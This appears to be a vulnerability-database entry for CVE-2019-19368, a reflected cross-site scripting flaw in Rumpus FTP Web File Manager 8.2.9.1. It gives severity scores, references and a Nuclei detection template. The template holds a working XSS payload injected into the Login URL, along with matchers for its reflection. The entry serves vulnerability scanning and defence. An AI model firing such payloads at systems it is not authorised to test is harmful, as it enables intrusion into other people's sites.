Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-19368
HistoryApr 08, 2020 - 1:05 p.m.

Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting

2020-04-0813:05:45
ProjectDiscovery
github.com

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

79.0%

Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.

id: CVE-2019-19368

info:
  name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability.
  reference:
    - https://github.com/harshit-shukla/CVE-2019-19368/
    - https://www.maxum.com/Rumpus/Download.html
    - http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19368
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-19368
    cwe-id: CWE-79
    epss-score: 0.00624
    epss-percentile: 0.78891
    cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: maxum
    product: rumpus
  tags: cve,cve2019,xss,ftp,packetstorm,maxum

http:
  - method: GET
    path:
      - "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "value=''><sVg/OnLoAD=alert`1337`//'>"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022016bf100f90067e9f71145810f28c7a2914a641cf8e0444dd9a981a24de72d27c022100e1ffa50abf3d2a3f444ad0832b9e6b98de5887b3df7f8b70a8956e3a0a7b474d:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.006 Low

EPSS

Percentile

79.0%